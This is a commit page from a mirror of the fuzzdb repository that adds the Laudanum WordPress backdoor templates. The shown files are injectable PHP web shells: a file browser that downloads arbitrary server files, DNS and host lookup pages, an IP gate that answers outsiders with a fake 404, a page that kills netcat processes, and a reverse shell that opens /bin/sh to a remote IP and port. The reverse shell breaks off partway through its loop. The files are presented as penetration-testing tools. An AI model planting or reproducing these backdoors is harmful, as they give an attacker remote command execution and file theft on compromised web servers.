mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 02:53:03 +00:00
Added files via upload
This commit is contained in:
parent
1162ef5379
commit
a10dc295fd
9 changed files with 1602 additions and 0 deletions
144
web-backdoors/wordpress/templates/dns.php
Normal file
144
web-backdoors/wordpress/templates/dns.php
Normal file
|
@ -0,0 +1,144 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides access to DNS on the system.
|
||||
*** Written by Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
include 'ipcheck.php';
|
||||
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP DNS Access</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
set_error_handler('error_handler');
|
||||
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
$query = isset($_POST['query']) ? $_POST['query'] : '';
|
||||
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP DNS Access</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
function init() {
|
||||
document.dns.query.focus();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="init()">
|
||||
|
||||
<h1>DNS Query 0.1</h1>
|
||||
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
|
||||
<fieldset>
|
||||
<legend>DNS Lookup:</legend>
|
||||
<p>Query:<input name="query" type="text">
|
||||
Type:<select name="type">
|
||||
<?php
|
||||
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
|
||||
|
||||
if (!in_array($type, array_keys($types))) {
|
||||
$type = "ANY";
|
||||
}
|
||||
|
||||
$validtype = 0;
|
||||
foreach (array_keys($types) as $t) {
|
||||
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
|
||||
}
|
||||
?>
|
||||
|
||||
</select>
|
||||
<input type="submit" value="Submit">
|
||||
</fieldset>
|
||||
</form>
|
||||
|
||||
|
||||
<?php
|
||||
if ($query != '')
|
||||
{
|
||||
$result = dns_get_record($query, $types[$type], $authns, $addtl);
|
||||
echo "<pre><results>";
|
||||
echo "Result = ";
|
||||
print_r($result);
|
||||
echo "Auth NS = ";
|
||||
print_r($authns);
|
||||
echo "Additional = ";
|
||||
print_r($addtl);
|
||||
echo "</results></pre>";
|
||||
}
|
||||
?>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
182
web-backdoors/wordpress/templates/file.php
Normal file
182
web-backdoors/wordpress/templates/file.php
Normal file
|
@ -0,0 +1,182 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file allows browsing of the file system.
|
||||
*** Written by Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** 12/28/2013 - updated by Jason Gillam <jgillam@secureideas.com> - fixed parent folder.
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
|
||||
include 'ipcheck.php';
|
||||
|
||||
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP File Browser</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
//set_error_handler('error_handler');
|
||||
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
|
||||
$file = isset($_GET["file"]) ? $_GET["file"] : "";
|
||||
|
||||
if ($file != "") {
|
||||
if(file_exists($file)) {
|
||||
|
||||
$s = split("/", $file);
|
||||
$filename = $s[count($s) - 1];
|
||||
header("Content-type: application/x-download");
|
||||
header("Content-Length: ".filesize($file));
|
||||
header("Content-Disposition: attachment; filename=\"".$filename."\"");
|
||||
readfile($file);
|
||||
die();
|
||||
}
|
||||
}
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum File Browser</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
</script>
|
||||
</head>
|
||||
<body onload="init()">
|
||||
|
||||
<h1>Laudanum File Browser 0.1</h1>
|
||||
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
|
||||
|
||||
<?php
|
||||
// get the actual path, add an ending / if necessary
|
||||
$curdir = realpath($dir);
|
||||
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
|
||||
|
||||
$dirs = split("/",$curdir);
|
||||
|
||||
// Create the breadcrumb
|
||||
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
|
||||
$breadcrumb = '/';
|
||||
foreach ($dirs as $d) {
|
||||
if ($d != '') {
|
||||
$breadcrumb .= $d . "/";
|
||||
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
|
||||
}
|
||||
}
|
||||
echo "</h2>";
|
||||
|
||||
// translate .. to a real dir
|
||||
$parentdir = "";
|
||||
for ($i = 0; $i < count($dirs) - 2; $i++) {
|
||||
$parentdir .= $dirs[$i] . "/";
|
||||
}
|
||||
|
||||
echo "<table>";
|
||||
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
|
||||
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
|
||||
|
||||
//get listing, separate into directories and files
|
||||
$listingfiles = array();
|
||||
$listingdirs = array();
|
||||
|
||||
if ($handle = @opendir($curdir)) {
|
||||
while ($o = readdir($handle)) {
|
||||
if ($o == "." || $o == "..") continue;
|
||||
if (@filetype($curdir . $o) == "dir") {
|
||||
$listingdirs[] = $o . "/";
|
||||
}
|
||||
else {
|
||||
$listingfiles[] = $o;
|
||||
}
|
||||
}
|
||||
|
||||
@natcasesort($listingdirs);
|
||||
@natcasesort($listingfiles);
|
||||
|
||||
//display directories
|
||||
foreach ($listingdirs as $f) {
|
||||
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
|
||||
}
|
||||
|
||||
//display files
|
||||
foreach ($listingfiles as $f) {
|
||||
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
|
||||
}
|
||||
?>
|
||||
</table>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
126
web-backdoors/wordpress/templates/host.php
Normal file
126
web-backdoors/wordpress/templates/host.php
Normal file
|
@ -0,0 +1,126 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides a host lookup by ip address.
|
||||
*** Written by Jason Gillam <jgillam@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
include 'ipcheck.php';
|
||||
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Hostname by IP Lookup</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
set_error_handler('error_handler');
|
||||
|
||||
|
||||
/* Initialize some variables we need again and again. */
|
||||
$query = isset($_POST['query']) ? $_POST['query'] : '';
|
||||
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum Host Lookup</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
|
||||
<script type="text/javascript">
|
||||
function init() {
|
||||
document.dns.query.focus();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="init()">
|
||||
|
||||
<h1>Host Lookup 0.1</h1>
|
||||
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
|
||||
<fieldset>
|
||||
<legend>Host Lookup:</legend>
|
||||
<p>IP:<input name="query" type="text">
|
||||
</select>
|
||||
<input type="submit" value="Submit">
|
||||
</fieldset>
|
||||
</form>
|
||||
|
||||
|
||||
<?php
|
||||
if ($query != '')
|
||||
{
|
||||
$result = gethostbyaddr($query);
|
||||
echo "<pre><results>";
|
||||
echo "Result = ";
|
||||
print_r($result);
|
||||
echo "</results></pre>";
|
||||
}
|
||||
?>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
61
web-backdoors/wordpress/templates/ipcheck.php
Normal file
61
web-backdoors/wordpress/templates/ipcheck.php
Normal file
|
@ -0,0 +1,61 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
|
||||
*** by someone other than the person who uploaded Laudanum. This file should be included
|
||||
*** in other Laudanum tools and not called directly.
|
||||
*** Written by Jason Gillam <jgillam@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
|
||||
// ***************** Config entries below ***********************
|
||||
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||
$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1");
|
||||
|
||||
|
||||
# *********** No editable content below this line **************
|
||||
|
||||
$wpl_allowed = 0;
|
||||
foreach ($wpl_allowedIPs as $IP) {
|
||||
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||
$wpl_allowed = 1;
|
||||
}
|
||||
|
||||
if ($wpl_allowed == 0) {
|
||||
header("HTTP/1.0 404 Not Found");
|
||||
die();
|
||||
}
|
||||
|
||||
?>
|
103
web-backdoors/wordpress/templates/killnc.php
Normal file
103
web-backdoors/wordpress/templates/killnc.php
Normal file
|
@ -0,0 +1,103 @@
|
|||
<?php
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net>
|
||||
*** Tim Medin <tim@counterhack.com>
|
||||
***
|
||||
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file attempts to kill all netcat processes spawned by the current user.
|
||||
*** This may be useful in cases where a reverse shell attempt has gone wrong.
|
||||
***
|
||||
*** Written by Jason Gillam <jgillam@secureideas.com>
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
|
||||
include 'ipcheck.php';
|
||||
|
||||
|
||||
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||
* errors, unless they have been suppressed with the @-operator. */
|
||||
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||
/* The @-opertor (used with chdir() below) temporarely makes
|
||||
* error_reporting() return zero, and we don't want to die in that case.
|
||||
* We do note the error in the output, though. */
|
||||
if (error_reporting() == 0) {
|
||||
$_SESSION['output'] .= $errstr . "\n";
|
||||
} else {
|
||||
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum PHP Hostname by IP Lookup</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Fatal Error!</h1>
|
||||
<p><b>' . $errstr . '</b></p>
|
||||
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>');
|
||||
}
|
||||
}
|
||||
|
||||
set_error_handler('error_handler');
|
||||
|
||||
|
||||
|
||||
?>
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>Laudanum Kill nc</title>
|
||||
<link rel="stylesheet" href="style.css" type="text/css">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<h1>Kill nc 0.1</h1>
|
||||
|
||||
<?php echo exec('killall nc');?>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
194
web-backdoors/wordpress/templates/php-reverse-shell.php
Normal file
194
web-backdoors/wordpress/templates/php-reverse-shell.php
Normal file
|
@ -0,0 +1,194 @@
|
|||
<?php
|
||||
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. The author accepts no liability
|
||||
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||
// do not use this tool.
|
||||
//
|
||||
// In all other respects the GPL version 2 applies:
|
||||
//
|
||||
// This program is free software; you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License version 2 as
|
||||
// published by the Free Software Foundation.
|
||||
//
|
||||
// This program is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
//
|
||||
// You should have received a copy of the GNU General Public License along
|
||||
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. If these terms are not acceptable to
|
||||
// you, then do not use this tool.
|
||||
//
|
||||
// You are encouraged to send comments, improvements or suggestions to
|
||||
// me at pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// Description
|
||||
// -----------
|
||||
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||
// The recipient will be given a shell running as the current user (apache normally).
|
||||
//
|
||||
// Limitations
|
||||
// -----------
|
||||
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||
//
|
||||
// Usage
|
||||
// -----
|
||||
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||
|
||||
set_time_limit (0);
|
||||
$VERSION = "1.0";
|
||||
$ip = isset($_POST['ip']) ? $_POST['ip'] : '10.2.2.1';
|
||||
//$ip = '10.2.2.1'; // CHANGE THIS
|
||||
//$port = 8888; // CHANGE THIS
|
||||
$port = isset($_POST['port']) ? $_POST['port'] : '8888';
|
||||
$chunk_size = 1400;
|
||||
$write_a = null;
|
||||
$error_a = null;
|
||||
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||
$daemon = 0;
|
||||
$debug = 0;
|
||||
|
||||
//
|
||||
// Daemonise ourself if possible to avoid zombies later
|
||||
//
|
||||
|
||||
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||
// our php process and avoid zombies. Worth a try...
|
||||
if (function_exists('pcntl_fork')) {
|
||||
// Fork and have the parent process exit
|
||||
$pid = pcntl_fork();
|
||||
|
||||
if ($pid == -1) {
|
||||
printit("ERROR: Can't fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ($pid) {
|
||||
exit(0); // Parent exits
|
||||
}
|
||||
|
||||
// Make the current process a session leader
|
||||
// Will only succeed if we forked
|
||||
if (posix_setsid() == -1) {
|
||||
printit("Error: Can't setsid()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
$daemon = 1;
|
||||
} else {
|
||||
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||
}
|
||||
|
||||
// Change to a safe directory
|
||||
chdir("/");
|
||||
|
||||
// Remove any umask we inherited
|
||||
umask(0);
|
||||
|
||||
//
|
||||
// Do the reverse shell...
|
||||
//
|
||||
|
||||
// Open reverse connection
|
||||
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||
if (!$sock) {
|
||||
printit("$errstr ($errno)");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Spawn shell process
|
||||
$descriptorspec = array(
|
||||
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||
);
|
||||
|
||||
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||
|
||||
if (!is_resource($process)) {
|
||||
printit("ERROR: Can't spawn shell");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Set everything to non-blocking
|
||||
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||
stream_set_blocking($pipes[0], 0);
|
||||
stream_set_blocking($pipes[1], 0);
|
||||
stream_set_blocking($pipes[2], 0);
|
||||
stream_set_blocking($sock, 0);
|
||||
|
||||
printit("Successfully opened reverse shell to $ip:$port");
|
||||
|
||||
while (1) {
|
||||
// Check for end of TCP connection
|
||||
if (feof($sock)) {
|
||||
printit("ERROR: Shell connection terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Check for end of STDOUT
|
||||
if (feof($pipes[1])) {
|
||||
printit("ERROR: Shell process terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Wait until a command is end down $sock, or some
|
||||
// command output is available on STDOUT or STDERR
|
||||
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||
|
||||
// If we can read from the TCP socket, send
|
||||
// data to process's STDIN
|
||||
if (in_array($sock, $read_a)) {
|
||||
if ($debug) printit("SOCK READ");
|
||||
$input = fread($sock, $chunk_size);
|
||||
if ($debug) printit("SOCK: $input");
|
||||
fwrite($pipes[0], $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDOUT
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[1], $read_a)) {
|
||||
if ($debug) printit("STDOUT READ");
|
||||
$input = fread($pipes[1], $chunk_size);
|
||||
if ($debug) printit("STDOUT: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDERR
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[2], $read_a)) {
|
||||
if ($debug) printit("STDERR READ");
